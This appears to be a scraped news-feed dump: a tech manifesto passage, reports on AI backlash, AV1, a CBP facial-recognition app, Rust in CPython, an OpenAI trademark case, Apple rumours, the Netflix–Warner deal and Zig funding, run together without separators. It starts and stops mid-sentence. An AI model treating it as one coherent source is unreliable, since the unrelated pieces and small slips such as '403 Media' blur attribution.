. It's the experience of encountering something that speaks to our deeper values. It's a spark of recognition, a sense that we're being invited to lean in, to participate. Unlike the digital junk food of the day, the more we engage with what resonates, the more we're left feeling nourished, grateful, alive. As individuals, following the breadcrumbs of resonance helps us build meaningful lives. As communities, companies, and societies, cultivating shared resonance helps us break away from perverse incentives, and play positive-sum infinite games together.
For decades, technology has required standardized solutions to complex human problems. In order to scale software, you had to build for the average user, sanding away the edge cases. In many ways, this is why our digital world has come to resemble the sterile, deadening architecture that Alexander spent his career pushing back against.
This is where AI provides a missing puzzle piece. Software can now respond fluidly to the context and particularity of each human—at scale. One-size-fits-all is no longer a technological or economic necessity. Where once our digital environments inevitably shaped us against our will, we can now build technology that
adaptively shapes itself
in service of our individual and collective aspirations. We can build resonant environments that bring out the best in every human who inhabits them.
And so, we find ourselves at this crossroads. Regardless of which path we choose, the future of computing will be hyper-personalized. The question is whether that personalization will be in service of keeping us passively glued to screens—wading around in the shallows, stripped of agency—or whether it will enable us to direct more attention to what matters.
In order to build the resonant technological future we want for ourselves, we will have to resist the seductive logic of hyper-scale, and challenge the business and cultural assumptions that hold it in place. We will have to make deliberate decisions that stand in the face of accepted best practices—rethinking the system architectures, design patterns, and business models that have undergirded the tech industry for decades.
We suggest these five principles as a starting place:
Private:
In the era of AI, whoever controls the context holds the power. While data often involves multiple stakeholders, people must serve as primary stewards of their own context, determining how it's used.
Dedicated:
Software should work exclusively for you, ensuring contextual integrity where data use aligns with your expectations. You must be able to trust there are no hidden agendas or conflicting interests.
Plural:
No single entity should control the digital spaces we inhabit. Healthy ecosystems require distributed power, interoperability, and meaningful choice for participants.
Adaptable:
Software should be open-ended, able to meet the specific, context-dependent needs of each person who uses it.
Prosocial:
Technology should enable connection and coordination, helping us become better neighbors, collaborators, and stewards of shared spaces, both online and off.
We, the signatories of this manifesto, are committed to building, funding, and championing products and companies that embed these principles at their core. For us, this isn't a theoretical treatise. We're already building tooling and infrastructure that will enable resonant products and ecosystems.
But we cannot do it alone. None of us holds all the answers, and this movement cannot succeed in isolation. That's why, alongside this manifesto, we're sharing an evolving list of principles and theses. These are specific assertions about the implementation details and tradeoffs required to make resonant computing a reality. Some of these stem from our experiences, while others will be crowdsourced from practitioners across the industry. This conversation is only just beginning.
If this vision resonates, we invite you to join us. Not just as a signatory, but as a contributor. Add your expertise, your critiques, your own theses. By harnessing the collective intelligence of people who earnestly care, we can chart a path towards technology that enables individual growth and collective flourishing.
Substantive changes that have been made to this manifesto:
11/18/25
- Changed several instances of the word "user," to "people" or other humanistic alternatives. The word user carries heavy connotations of addiction.
10/28/25
- Updated the first principle (private) to include more nuanced language around the ownership of data. People must be the primary stewards of their context, but every system has multiple stakeholders.
10/28/25
- Updated the second principle (dedicated) to include the "contextual integrity" privacy model.
10/27/25
- Added header artwork and poetic introduction.
The AI Backlash Is Here: Why Public Patience with Tech Giants Is Running Out
On OpenAI’s new social app, Sora 2, a
popular video
shows a disturbingly lifelike
Sam Altman
sprinting out of a Target store with stolen computer chips, begging police not to take his “precious technology.” The clip is absurdist, a parody of the company’s own CEO, but it also speaks to a larger conversation playing out in dinner conversations, group chats and public spaces around the country: What, exactly, is this technology for?
From ads scrawled with graffiti to online comment sections filled with mockery, the public’s patience with AI-generated media is starting to wear thin. Whether it's YouTube comments deriding synthetic ad campaigns or scribbled in Sharpie across New York City subway posters for
AI
startups, the public's discontent with the AI boom is growing louder.
What began in 2022 as broad optimism about the power of generative AI to make peoples' lives easier has instead shifted toward a sense of deep cynicism that the technology being heralded as a game changer is, in fact, only changing the game for the richest technologists in Silicon Valley who are benefiting from what appears to be an almost endless supply of money to build their various AI projects — many of which don't appear to solve any actual problems. Three years ago, as OpenAI's ChatGPT was making its splashy debut,
a Pew Research center survey
found that nearly one in five Americans saw AI as a benefit rather than a threat. But by 2025, 43 percent of U.S. adults now believe AI is
more likely to harm them
than help them in the future, according to Pew.
Slop as a Service
As AI spreads, public skepticism is turning into into open hostility toward its products and ads. Campaigns made with generative AI are mocked online and vandalized in public. Friend, a startup that spent $1 million on a sprawling campaign in the New York City subway with more than 11,000 advertisements on subway cars, 1,000 platform posters, and 130 urban panels, has been hit especially hard. Most of its ads were defaced with graffiti calling the product “surveillance capitalism” and urging people to “get real friends.”
"AI doesn't care if you live or die," reads one tag on a Friend ad in Brooklyn.
Other brands like Skechers are seeing similar backlash for an AI-generated campaign showing a distorted woman in sneakers, dismissed as lazy and unprofessional. Many of the Skechers subway posters were quickly defaced — some tagged with “slop,” the memeified shorthand for AI’s cheap, joyless flood of content, now embodied by the Altman deepfakes flooding Sora.
“The idea of authenticity has long been at the center of the social media promise, for audiences and content creators alike. But a lot of AI-generated content is not following that logic,” said Natalia Stanusch, a researcher at AI Forensics, a nonprofit that investigates the impact of artificial intelligence on digital ecosystems.
“With this flood of content made using generative AI, there is a threat of social media becoming less social and users are noticing this trend,” she told
Newsweek
.
'Wildly Oversold'
In an era where the boundaries between the digital and physical worlds are becoming nearly indistinguishable, one thing is becoming increasingly clear: the skepticism toward generative
artificial intelligence
is rising on both sides of the political divide. What once held the promise of innovation in the arts—an AI that could generate art, compose music or write coherent, even beautiful, prose—has begun to feel more like saturation.
The friction isn’t just about quality—it’s about what the ubiquity of these tools signals. In entertainment, backlash has mounted as high-profile artists find themselves cloned without consent. After an AI-generated song mimicking his voice went viral on TikTok, rapper Bad Bunny lashed out on WhatsApp, telling his 19 million followers that, if they enjoyed the track, “you don’t deserve to be my friends.” Similar complaints came from Drake and The Weeknd whose own AI replicas were pulled from streaming platforms after public outcry.
“The public is finally starting to catch on,” said Gary Marcus, a professor emeritus at NYU and one of the field’s most vocal critics. “Generative AI itself may be a fad and certainly has been wildly oversold.”
That saturation, according to Marcus and others, has less to do with AI’s breakthroughs and more to do with the way companies have stripped out human labor under the guise of innovation. It's a shift that has turned into backlash—one fueled not only by developers and ethicists but by cultural figures, creators and the general public.
Alex Hanna, director of research at the Distributed AI Research Institute (DAIR) and co-author of
The A.I. Con
:
How to Fight Big Tech’s Hype and Create the Future We Want
—a critique of large language models (LLMs), the technology behind AI systems like ChatGPT and Sora—told
Newsweek
that public opinion is increasingly aligning with his criticism.
“We’re seeing this narrative that AI is this inevitable future and it's being used to shut down questions about whether people actually want these tools or benefit from them,” Hanna said. “It becomes an excuse to displace workers, to automate without accountability, and with serious questions about its impact on the environment.”
“Companies want to make it look like AI is magic,” Hanna added. “But behind that magic is a labor force, data that’s been extracted without consent and an entire system built on exploitation.”
One telling example:
Meta
’s recent launch of Vibes, a TikTok-style video app featuring only AI-generated content, was met with widespread mockery. “No one asked for this,” one viral post read. Stanusch, of AI Forensics, agreed: “For the near future, we don’t expect this adoption to slow down but rather increase,” she said.
Even as capital flows into AI infrastructure buildouts, the cultural effect of so much "slop" is creating its own language of resistance.
The term “clanker”—borrowed from Star Wars and repurposed by Gen Z—has exploded in popularity
on TikTok as a meme-slur for robots and AI systems replacing human jobs. The term, while satirical, reflects deeper anxieties about labor displacement, particularly among younger workers entering an economy being transformed by AI.
Still, some see a long-term upside. “The robots are coming, and they’re coming for everyone’s jobs," said Adam Dorr, director of research at RethinkX, in an interview with
Newsweek
. “But in the longer term, AI could take over the dangerous, miserable jobs we’ve never wanted to do.”
Dorr, like others, urges caution—not rejection. “The challenge is: how do we make this transformation safely?” he said. “People are right to be scared. We’re already on the train—and the destination may be great but the journey will be chaotic.”
The Bubble Threat
From mental health chatbots and short-form video apps to corporate ad campaigns and
toilet cameras
that can analyze feces, AI is everywhere, and billions of dollars are still pouring in.
But saturation breeds doubt: what might look like cutting-edge innovation to investors is starting to look like a bubble to everyone else.
In just the first half of 2025, global investment in AI infrastructure topped $320 billion, with $225 billion coming from U.S. hyperscalers and sovereign-backed funds, according to IDC. Microsoft alone committed over $50 billion to data center expansion this year. Meta, Amazon, OpenAI and others are backing the $500 billion Stargate AI initiative — championed by the Trump administration.
Since returning to office,
Donald Trump
has made AI central to his economic agenda, fast-tracking permitting for AI infrastructure and declaring in a recent speech: “We will win the AI race just like we did the space race.”
But many experts are unconvinced the numbers add up. “AI spending outpacing current real economic returns is not a problem—that’s what many innovative technologies call for,” Andrew Odlyzko, professor emeritus at the University of Minnesota, told
Newsweek
. “The problem is that current (and especially projected) AI spending appears to be outpacing plausible future real economic returns.”
Odlyzko warned that much of the sector is propped up by “circular investment patterns,” in which AI companies fund one another without enough real customer demand. In one such example, Nvidia recently said it would invest $100 billion in OpenAI to help it build massive data centers, essentially backstopping its own customer. “If there was a big rush of regular non-AI companies paying a lot for AI services, that would be different," Odlyzko said. "But there is no sign of it.”
Other experts like British technology entrepreneur Azeem Azhar have compared the current capex boom to past busts. “The trillions pouring into servers and power lines may be essential,” he wrote on his Substack, “but history suggests they are not where enduring profits accumulate.”
And while lawsuits over AI training data have begun piling up—including one filed by
The New York Times
against OpenAI—others center on how generative tools imitate distinct styles. A viral 2025 trend saw
ChatGPT
produce Studio Ghibli-style images so convincingly that it appeared the beloved Japanese animation studio had endorsed the platform. They had not.
In the meantime, so far, AI remains deeply unprofitable at scale. Last month, the consulting firm Bain
predicted
the AI industry would need to be making $2 trillion in combined annual revenues by 2030 to meet expected data center demand — a shortfall of roughly $800 billion.
“There is a lack of deep value,” the tech columnist and AI critic Ed Zitron told
Newsweek
. “The model is unsustainable.” And yet, with billions of dollars and the weight of national policy behind it, even skeptics agree: if and when the AI bubble bursts, its impact will ripple far beyond Silicon Valley.
The AV1 specification was honored with a Technology & Engineering Emmy Award on Dec. 4, 2025.
The web needed a new video codec
Through the mid-2010s, video codecs were an
invisible tax on the web
, built on a closed licensing system with expensive, unpredictable fees. Most videos online relied on the H.264 codec, which open-source projects like Firefox could only support without paying MPEG LA license fees thanks to Cisco’s
open-source OpenH.264 module
.
Especially as demand for video grew, the web needed a next-generation codec to make high-quality streaming faster and more reliable. H.265 promised efficiency gains, but there was no guarantee of another OpenH.264-style arrangement. The risk was another fragmented ecosystem where browsers like Firefox couldn’t play large portions of the web’s video.
Enter AV1
To solve this, Mozilla joined other technical leaders to form the
Alliance for Open Media
(AOM) in 2015 and started ambitious work on a next-generation codec built from Google’s VP9, Mozilla’s Daala, and Cisco’s Thor.
The result was AV1, released in 2018, which delivered top-tier compression as an open standard under a royalty-free patent policy. It’s now widely deployed across the streaming ecosystem, including hardware decoders and optimized software decoders which allow open-source browsers like Firefox to
provide
state of the art video compression to all users across the web.
AV1 is also the foundation for the image format
AVIF
, which is
deployed
across browsers and provides excellent compression for still and animated images (AVIF is based on a video codec, after all).
The Emmy award reflects the value of open standards, open-source software, and the sustained work by AOM participants and the broader community fighting for an open web.
Looking ahead to AV2
AV1 fixed a structural problem in the ecosystem at the time, but the work isn’t finished. Video demand keeps rising, and the next generation of open codecs must remain competitive.
AOMedia is working on the upcoming release of
AV2
. It will
feature
meaningfully better compression than AV1, much higher efficiency for screen/graphical content, alpha channel support, and more.
As AV2 arrives, our goal remains unchanged: make video on the web open, efficient, and accessible to everyone.
Related Articles
DHS’s Immigrant-Hunting App Removed from Google Play Store
403 Media
www.404media.co
2025-12-05 17:05:47
The app, called Mobile Identify, was launched in November, and lets local cops use facial recognition to hunt immigrants on behalf of ICE. It is unclear if the removal is temporary or not....
A Customs and Border Protection (CBP) app that lets local cops use facial recognition to hunt immigrants on behalf of the federal government has been removed from the Google Play Store, 404 Media has learned.
It is unclear if the removal is temporary or not, what the exact reason is for the removal, or if Google or CBP removed the app. Neither Google nor CBP immediately responded to a request for comment. Its removal comes after
404 Media documented multiple instances
of CBP and ICE officials using their own facial recognition app to identify people and verify their immigration status, including people who said they were U.S. citizens.
The removal also comes after “hundreds” of Google employees took issue with the app, according to a source with knowledge of the situation.
“Google's a very big place, and most people at the company haven't heard anything about this, yet hundreds signaled their displeasure with the app approval, either directly in the internal report about the app, or in memes about it,” the source said. 404 Media granted multiple sources in this story anonymity to protect them from retaliation.
💡
Do you know anything else about this removal or app? I would love to hear from you. Using a non-work device, you can message me securely on Signal at joseph.404 or send me an email at joseph@404media.co.
“We're sorry, the requested URL was not found on this server,” the app’s Play Store page says at the time of writing.
CBP launched the app, called Mobile Identify, in November. It lets a police officer point their smartphone camera at a person, perform a face scan, and the app will tell the agency to contact ICE about the person or not. The app is designed “to identify and process individuals who may be in the country unlawfully,” according to the app’s Play Store page before it was removed.
As
404 Media reported
at the time of the app’s launch, the Play Store page itself makes no mention of facial recognition. But 404 Media downloaded a copy of the app, compiled its code, and found clear references to scanning faces, such as a package called “facescanner.”
A source with knowledge of the app previously told 404 Media the app doesn’t return names after a face search. Instead it tells users to contact ICE and provides a reference number, or to not detain the person depending on the result.
The app is specifically for local and state agencies that are part of the 287(g) program, in which ICE delegates certain immigration-related powers to local and state agencies. Members of the 287(g) Task Force Model (TFM) are allowed to enforce immigration authorities during their ordinary police duties, and “essentially turns police officers into ICE agents,” according to
the New York Civil Liberties Union
.
Google
previously told 404 Media
in a statement “This app is only usable with an official government login and does not publicly broadcast specific user data or location. Play has robust policies and when we find a violation, we take action.” Critics saw a disconnect between Google hosting a CBP app for hunting immigrants, while at the same time removing apps that let local communities report sightings of ICE officials. Google
previously described ICE officials
as a vulnerable group in need of protection.
Mobile Identify is essentially a watered-down version of Mobile Fortify, a more powerful facial recognition app
CBP and ICE are using in the field
. That app, based on leaked emails and other material obtained by 404 Media, uses CBP systems usually reserved for identifying travellers entering the U.S., and turns that technology inwards. It queries a
database of more than 200 million images
when an ICE official scans a subject’s face, according to the material. It then returns a subject’s name, date of birth, “alien number,” and whether they’ve been given an order of deportation. That app is not publicly available, and instead can only be downloaded onto DHS-issued work devices.
An internal DHS document
404 Media obtained
said ICE does not let people decline to be scanned by the app.
Before it was removed, the app had been downloaded more than a hundred times, according to 404 Media’s earlier review of the Play Store page.
About the author
Joseph is an award-winning investigative journalist focused on generating impact. His work has triggered hundreds of millions of dollars worth of fines, shut down tech companies, and much more.
Emma Smith and Kirill Podoprigora, two of Python's core developers, have
opened a
discussion
about including Rust code in CPython, the reference implementation of
the Python programming language. Initially, Rust would only be used for optional
extension modules, but they would like to see Rust become a required dependency
over time. The initial plan was to make Rust required by 2028, but Smith and
Podoprigora indefinitely postponed that goal in response to concerns raised in the discussion.
The proposal
The timeline given in their pre-PEP
called for Python 3.15 (expected in October 2026) to add a warning to Python's
configure script if Rust is not available when Python is built. Any uses of
Rust would be strictly optional at that point, so the build wouldn't fail if it is
missing. At this stage, Rust would be used in the implementation of the standard
library, in order to implement native versions of Python modules that are
important to the performance of Python applications, such as base64. Example
code to accomplish this was included in the proposal.
In 3.16, the configure script would fail if Rust is missing unless
users explicitly provide the "
--with-rust=no
" flag. In 3.17 (expected
in 2028), Python could begin strictly requiring Rust at build time — although
it would not be required at run time, for users who get their Python
installation in binary form.
Besides Rust's appeal as a solution to memory-safety problems, Smith cited that
there are
an increasing number of third-party Python extensions written
in Rust as a reason to bring the proposal forward. Perhaps, if Rust code could be
included directly in the CPython repository, the project would attract more
contributors interested in bringing their extensions into the standard library,
she said. The example in the pre-PEP was the base64 module, but she expressed
hope that many areas of the standard library could see improvement.
She also highlighted the
Rust for Linux
project as an example of this kind of
integration going well.
No AI slop, all substance: subscribe to LWN today
LWN has always been about quality over quantity; we need your help
to continue publishing in-depth, reader-focused articles about Linux
and the free-software community. Please subscribe today to support our work
and keep LWN on the air; we are offering
a free one-month trial subscription
to get you started.
Cornelius Krupp was
apprehensive
; he thought that the Rust-for-Linux project was more of a
cautionary tale, given the public disagreements between maintainers. Those
disagreements have settled down over time, and the kernel community is currently
integrating Rust with reasonable tranquility, but the Rust for Linux project
still reminds many people of how intense disagreements over programming
languages can get in an established software project. Jacopo
Abramo
had the same worry
, but thought that the Python community might weather that kind of
disagreement better than the kernel community has. Smith
agreed
with Abramo, saying that she expected the experience to be "
altogether
different
" for Python.
Steve Dower had a
different reason
to oppose the proposal: he wasn't against the Rust part,
but he was against adding additional optional modules to Python's core code. In
his view, optional extensions should really live in a separate repository. Da
Woods
called out
that the proposal wouldn't bring any new features or
capabilities to Python. Smith replied (in the same message linked above) that
the goal was to eventually introduce Rust into the core of Python, in a
controlled way. So, the proposal wasn't only about enabling extension modules.
That
didn't satisfy
Dower, however. He said that his experience with Rust,
mixed-language code, and teams forced him to disapprove of the entire proposal.
Several
other community members
agreed with his disapproval for reasons of their
own.
Chris Angelico
expressed concern
that Rust might be more susceptible to a
"trusting trust"
attack
(where a compiler is invisibly subverted to introduce targeted
backdoors) than C, since right now Rust only has one usable compiler.
Sergey Davidoff
linked to
the
mrustc
project, which can be used to show that the Rust compiler (rustc) is free of such attacks by
comparing the artifacts produced from rustc and mrustc. Dower
agreed
that Rust didn't pose any more security risk than C, but also wasn't sure how it
would provide any security benefits, given that CPython is full of low-level C
code that any Rust code will need to interoperate with.
Aria Desires
pointed
to
the
recent Android Security post
about the adoption of Rust as
evidence that mixed code
bases adopting Rust do end up with fewer
security vulnerabilities.
Not everyone was against the proposal, however.
Alex
Gaynor
and
James Webber
both spoke up in favor. Guido van Rossum
also approved
, calling the proposal a great development and saying that he
trusted Smith and others to guide the discussion.
Stephan Sokolow
pointed out
that many people were treating the discussion as being about
"
Rust vs. C
", but that in reality it might be "
Rust vs. wear out and stop
contributing
". Paul Moore
thought
that was an insightful point, and that the project should be
willing to put in some work now in order to make contributing to the
project easier in the future.
Nathan Goldbaum is a maintainer of the
PyO3
project
, which provides Rust bindings to the Python interpreter to support
embedding Python in Rust applications and writing Python extensions in Rust. He
said
that having official Rust bindings would significantly reduce the amount of work
he has to do to support new Python versions. Another PyO3 maintainer, David
Hewitt,
agreed
, going on to suggest that perhaps CPython would benefit from looking
at the API that PyO3 has developed over time and picking "
the bits that work best
".
Raphael Gaschignard
thought
that the example Rust code Smith had provided would be a more
compelling argument for adopting Rust if it demonstrated how using the language could
simplify error handling and memory management compared to C code. Smith
pointed out
one such example, but concurred that the current
proof-of-concept code wasn't a great demonstration of Rust's benefits in this
area.
Gentoo developer Michał Górny
said
that the inclusion of Rust in CPython would be unfortunate for Gentoo,
which
supports
many niche architectures that other distributions don't:
I do realize that these platforms are not "supported" by CPython right now.
Nevertheless, even though there historically were efforts to block building on
them, they currently work and require comparatively little maintenance effort to
keep them working. Admittedly, the wider Python ecosystem with its Rust adoption
puts quite a strain on us and the user experience worsens every few months, we
still manage to provide a working setup.
[...]
That said, I do realize that we're basically obsolete and it's just a matter of
time until some projects pulls the switch and force us to tell our users "sorry,
we are no longer able to provide a working system for you".
Hewitt
offered
assistance with Górny's integration problems. "
I build PyO3 [...] to empower
more people to write software, not to alienate.
" Górny
appreciated
the thought, but reiterated that the problem here was Rust
itself and its platform support.
Scaling back
In response to the concerns raised in the discussion, Smith and Podoprigora
scaled back
the goals of the proposal, saying that it should be limited to
using Rust for optional extension modules (i.e. speeding up parts of the
standard library) for the foreseeable future. They still
want to see Rust adopted in CPython's core eventually, but a more gradual
approach should help address problems raised by bootstrapping, language
portability, and related concerns that people raised in the thread, Smith said.
That struck some people as too conservative. Jelle Zijlstra
said
that if the proposal were limited to optional extension modules, it
would bring complexity to the implementation of the
standard library for a marginal benefit. Many
people are excited about bringing Rust to CPython, Zijlstra said, but
restricting Rust code to optional modules means putting Rust in the place that it
will do the least good for the CPython code. Several other commenters agreed.
Smith
pushed back
, saying that moving to Rust was a long-term investment in the
quality of the code, and that having a slow, conservative early period of
the transition would help build out the knowledge and experience necessary to
make the transition succeed. She later
clarified
that a lot of the benefit she saw from this overly careful
proposal was doing the groundwork to make using Rust possible at all: sorting
out the build-system integration, starting to gather feedback from users and
maintainers, and prototyping what a native Rust API for Python could look like.
All of that has to happen before it makes sense to consider Rust in the core
code — so even though she eventually wants to reach that state, it makes sense
to start here.
At the time of writing, the discussion is still ongoing. The Python community
has not reached a firm conclusion about the adoption of Rust — but it has
definitely ruled out a
fast
adoption. If Smith and Podoprigora's
proposal moves forward, it still seems like it will be several years before Rust is
adopted in CPython's core code, if it ever is. Still, the discussion also
revealed a lot of enthusiasm for Rust — and that many people would rather
contribute code written in Rust than attempt to wrestle with CPython's existing
C code.
Onlook (YC W25) the Cursor for Designers Is Hiring a Founding Fullstack Engineer
Hey HN! I'm Daniel, building Onlook, the Cursor for Designers. We built an open-source collaborative canvas for code that lets designers and developers craft incredible web experiences together.
Since launching, Onlook hit #1 on Hacker News, was the #1 trending repo on GitHub—above DeepSeek + Anthropic—and has earned over 23,000 GitHub stars. We’re looking to bring on Onlook’s first Founding Engineers.
This role requires autonomy - you’ll be setting standards for one of the fastest-growing open source projects backed by YC ever. You’ll help design and build an uncompromising visual IDE loved by tens of thousands of designers and engineers around the world, and you'll have a heavy influence on the direction of where we take the company.
You’re a full-stack engineer based in the U.S. who is ultra comfortable in Typescript, NextJS, React, and Tailwind, and ready to jump-in and build.
The most important things we look for:
• Olympic-level dedication – you want to be the best in the world at what you do.
• Ownership – you like autonomy and control over the destiny of the company.
• Speed – you’re comfortable shipping and iterating quickly with feedback.
• Craft – you’re opinionated and are willing to defend your opinions.
Ideally, you:
• Are looking for a fast-paced, early startup environment.
• Are willing to put in long hours and go the extra mile.
• Are comfortable with any part of the stack, front-end, back-end, or database.
• Believe in open source and are ok with your work being very public.
The comp range for this role is $130k-200k, 1-5% equity, great healthcare + other perks, and an awesome office if you happen to be in SF. We're open to remote / hybrid candidates.
If you’d like to stand out, please share a project or piece of work that you’re most proud of. We love seeing people’s work. If you have a personal website, please include that as well.
A U.S. appeals court has upheld a temporary restraining order that prevents OpenAI and Jony Ive's new hardware venture from using the name "io" for products similar to those planned by AI audio startup iyO,
Bloomberg Law
reports.
iyO
sued OpenAI earlier this year
after the latter announced its partnership with Ive's new firm, arguing that OpenAI's planned "io" branding was too close to its own name and related to similar AI-driven hardware. Court filings later showed that Ive and Sam Altman chose the name io in mid-2023, and that iyO CEO Jason Rugolo had approached Altman in early 2025 seeking funding for a project about "the future of human-computer interface." Altman declined, saying he was already working on "something competitive."
OpenAI countered that io's first product would not be a wearable device, and that Rugolo had voluntarily disclosed details about iyO while suggesting OpenAI acquire his company for $200 million. Despite this, a district court issued a temporary restraining order blocking OpenAI, Altman, Ive, and IO Products, Inc. from using the io mark in connection with products deemed sufficiently similar to iyO's planned AI-audio computer. OpenAI removed its io branding shortly after.
The Ninth Circuit affirmed the order earlier this week. The court agreed there was a likelihood of confusion between "IO" and "iyO," that reverse confusion was a significant risk given OpenAI's size, and that iyO could face irreparable harm to its brand and fundraising. However, the ruling does not bar all uses of the io name, only marketing and selling hardware similar to iyO's.
The case now returns to the district court for a preliminary injunction hearing in April 2026, with the broader litigation expected to extend into 2027 and 2028. OpenAI's first hardware device is expected to
launch next year
.
We're getting closer to the launch of the final major iOS update of the year, with Apple set to release iOS 26.2 in December. We've had three betas so far and are expecting a fourth beta or a release candidate this week, so a launch could follow as soon as next week.
Past Launch Dates
Apple's past iOS x.2 updates from the last few years have all happened right around the middle of the...
Tuesday December 2, 2025 11:09 am PST by
Juli Clover
Apple is encouraging iPhone users who are still running iOS 18 to upgrade to iOS 26 by making the iOS 26 software upgrade option more prominent.
Since iOS 26 launched in September, it has been displayed as an optional upgrade at the bottom of the Software Update interface in the Settings app. iOS 18 has been the default operating system option, and users running iOS 18 have seen iOS 18...
Apple is expected to launch a new foldable iPhone next year, based on multiple rumors and credible sources. The long-awaited device has been rumored for years now, but signs increasingly suggest that 2026 could indeed be the year that Apple releases its first foldable device.
Subscribe to the MacRumors YouTube channel for more videos.
Below, we've collated an updated set of key details that ...
Wednesday December 3, 2025 10:33 am PST by
Juli Clover
Apple today seeded the release candidate versions of upcoming iOS 26.2 and iPadOS 26.2 updates to developers and public beta testers, with the software coming two weeks after Apple seeded the third betas. The release candidates represent the final versions of iOS 26.2 and iPadOS 26.2 that will be provided to the public if no further bugs are found during this final week of testing....
In a statement shared with Bloomberg on Wednesday, Apple confirmed that its software design chief Alan Dye will be leaving. Apple said Dye will be succeeded by Stephen Lemay, who has been a software designer at the company since 1999.
Meta CEO Mark Zuckerberg announced that Dye will lead a new creative studio within the company's AR/VR division Reality Labs.
On his blog Daring Fireball,...
Apple's iPhone 17 lineup is selling well enough that Apple is on track to ship more than 247.4 million total iPhones in 2025, according to a new report from IDC.
Total 2025 shipments are forecast to grow 6.1 percent year over year due to iPhone 17 demand and increased sales in China, a major market for Apple.
Overall worldwide smartphone shipments across Android and iOS are forecast to...
2026 could be a bumper year for Apple's Mac lineup, with the company expected to announce as many as four separate MacBook launches. Rumors suggest Apple will court both ends of the consumer spectrum, with more affordable options for students and feature-rich premium lines for users that seek the highest specifications from a laptop.
Below is a breakdown of what we're expecting over the next ...
The iPhone Air has recorded the steepest early resale value drop of any iPhone model in years, with new data showing that several configurations have lost almost 50% of their value within ten weeks of launch.
According to a ten-week analysis published by SellCell, Apple's latest lineup is showing a pronounced split in resale performance between the iPhone 17 models and the iPhone Air....
iPhone 17 Pro models, it turns out, can't take photos in Night mode when Portrait mode is selected in the Camera app – a capability that's been available on Apple's Pro devices since the iPhone 12 Pro in 2020.
If you're an iPhone 17 Pro or iPhone 17 Pro Max owner, try it for yourself: Open the Camera app with Photo selected in the carousel, then cover the rear lenses with your hand to...
Apple's iPhone development roadmap runs several years into the future and the company is continually working with suppliers on several successive iPhone models at the same time, which is why we often get rumored features months ahead of launch. The iPhone 18 series is no different, and we already have a good idea of what to expect for the iPhone 18 Pro and iPhone 18 Pro Max.
One thing worth...
Netflix Agrees to Buy Warner Bros., Including HBO, for $83 Billion
Daring Fireball
www.latimes.com
2025-12-05 16:47:44
Meg James, reporting for The Los Angeles Times (News+ link):
The two companies announced the blockbuster deal early Friday
morning. The takeover would give Netflix such beloved characters
as Batman, Harry Potter and Fred Flintstone.
Fred Flintstone?
“Our mission has always been to entertai...
Netflix has prevailed in its bid to buy Warner Bros., agreeing to pay $72 billion for the Burbank-based Warner Bros. film and television studios, HBO Max and HBO.
The two companies announced the blockbuster deal early Friday morning. The takeover would give Netflix such beloved characters as Batman, Harry Potter and Fred Flintstone.
“Our mission has always been to entertain the world,” Ted Sarandos, co-CEO of Netflix, said in a statement. “By combining Warner Bros.’ incredible library of shows and movies — from timeless classics like ‘Casablanca’ and ‘Citizen Kane’ to modern favorites like ‘Harry Potter’ and ‘Friends’ — with our culture-defining titles like ‘Stranger Things,’ ‘KPop Demon Hunters’ and ‘Squid Game,’ we’ll be able to do that even better.”
Netflix’s cash and stock transaction is valued at about $27.75 per Warner Bros. Discovery share. Netflix also agreed to take on more than $10 billion in Warner Bros. debt, pushing the deal’s value to $82.7 billion.
The breakthrough came earlier this week, after the three contenders — Netflix, Paramount and Comcast — submitted binding second-round offers. Netflix’s victory was assured by late Thursday, soon after another deadline for last-minute deal sweeteners. Netflix and Warner’s boards separately and unanimously approved the transaction.
Warner’s cable channels, including CNN, TNT and HGTV, are not included in the deal. They will form a new publicly traded company, Discovery Global, in mid-2026.
Anti-trust experts anticipate opposition to Netflix’s proposed takeover. Netflix has more than 300 million streaming subscribers worldwide, and with HBO Max, the company’s base would swell to more than 420 million subscribers — a staggering sum much greater than any of the other premium video-on-demand streaming services.
In addition, Netflix has long prioritized releasing movies to its streaming platform — bypassing movie theater chains.
The deal posed “an unprecedented threat to the global exhibition business,” Cinema United, a trade group representing owners of more than 50,000 movie screens, said in a statement announcing its opposition.
“The negative impact of this acquisition will impact theatres from the biggest circuits to one-screen independents in small towns in the United States and around the world,” Cinema United President Michael O’Leary said in a statement. “Netflix’s stated business model does not support theatrical exhibition.”
Netflix, in the statement, said it would maintain Warner Bros. operations, including theatrical releases for Warner Bros. films.
The Directors Guild of America said the proposed combination “raises significant concerns.”
“A vibrant, competitive industry — one that fosters creativity and encourages genuine competition for talent — is essential to safeguarding the careers and creative rights of directors and their teams,” the DGA spokesperson said. “We will be meeting with Netflix to outline our concerns and better understand their vision for the future of the company.”
Losing the auction is a crushing blow for Paramount’s David Ellison, the 42-year-old tech scion who envisioned building a juggernaut with the two storied movie studios, HBO and two dozen cable channels.
One month after buying Paramount, he set his sights on Warner Bros., triggering the auction with a series of unsolicited bids in September and early October.
But Warner Bros. Discovery’s board rejected Paramount’s offers as too low. In late October, the board opened the auction up to other bidders.
Comcast also leaped into the bidding for Warner’s studios, HBO and its streaming service. Comcast wanted to spin off its NBCUniversal media assets and merge them with Warner Bros. to form a new jumbo studio.
More to Read
X hit with $140M EU fine for breaching content rules
Synadia
and TigerBeetle have together pledged $512,000 to the
Zig Software Foundation
over the next two
years in support of the language, leadership, and communities building
the future of simpler systems software.
I first saw Zig in 2018, seven years ago. Two years later, I chose
Zig over C or Rust for TigerBeetle.
What I learned is that if you could centralize resource allocation in
time and space (the dimensions that prove tricky for humans writing
software) then this could not only simplify memory management, to design
away some of the need for a borrow checker in the first place, but, more
importantly, also be a forcing function for propagating good design, to
encourage teams to think through the explicit limits or physics of the
software (you have no choice).
From a performance perspective, I didn’t want TigerBeetle to be
fearlessly multithreaded.
Transaction
processing workloads tend to have inherent contention
, even to the
point of power law, precluding partitioning and necessitating a
single-threaded architecture. Therefore, Rust’s borrow checker, while a
phenomenal tool for the class of problems it targets, made less sense
for TigerBeetle. TigerBeetle never frees memory and never runs
multithreaded, instead using explicit submission/completion queue
interfaces by design.
Finally, while the borrow checker could achieve local memory safety,
TigerBeetle needed more correctness properties. TigerBeetle needed to be
always correct, and across literally thousands of invariants.
As matklad
would say, this is a harder problem!
I had also spent enough time in
memory safe languages to know that local memory safety is no guarantee
of local correctness, let alone distributed system correctness. Per
systems thinking, I believe that total correctness is a design problem,
not a language problem. Language is valuable. But no human language can
guarantee the next Hemingway or Nabokov. For this you need philosophy.
Even then it’s not a guarantee but a probability.
With Rust off the table, the choice fell to C or Zig. A language of
the past or future?
Zig was early, which gave me pause, but I felt that the quality of
